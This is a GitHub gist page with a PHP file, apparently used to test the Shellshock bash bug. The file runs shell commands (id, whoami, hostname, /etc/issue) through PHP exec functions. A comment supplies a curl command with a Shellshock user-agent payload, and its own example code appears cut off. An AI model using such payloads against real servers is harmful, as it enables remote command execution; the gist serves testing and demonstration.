Created
September 26, 2014 09:17
-
-
Save alexs77/4859c72a77e1b6eaf785 to your computer and use it in GitHub Desktop.
Nächster Versuch, ein exploitable PHP zu schreiben.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php header("Content-Type: text/plain");?> | |
| system("/usr/bin/id") => <?php system("/usr/bin/id"); ?> | |
| shell_exec("/bin/hostname") => <?php echo shell_exec("/bin/hostname"); ?> | |
| shell_exec("/bin/bash -c /bin/date") => <?php echo shell_exec("/bin/bash -c /bin/date"); ?> | |
| exec("/usr/bin/whoami") => <?php echo exec("/usr/bin/whoami"); ?> | |
| popen... => <?php | |
| flush(); | |
| $fp = popen('/usr/bin/head /etc/issue 2>&1', "r"); | |
| while(!feof($fp)) | |
| { | |
| // send the current file part to the browser | |
| print fread($fp, 1024); | |
| // flush the content to the browser | |
| flush(); | |
| } | |
| fclose($fp); | |
| ?> | |
| shell_exec mit HTTP_USER_AGENT => | |
| <?php | |
| echo shell_exec("HTTP_USER_AGENT(){ /usr/bin/id; }; HTTP_USER_AGENT"); | |
| ?> | |
| done; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
You need to export some variable as a environment variable for the shell to be executed.
/';"); ?>This is my example of vulnerable php code:
This vulnerable code can be exploited by setting the user agent to something nasty like:
curl --user-agent '() { ignored;} ; /usr/bin/id ;' http://example.com/serverinfo.php
Michal Ambroz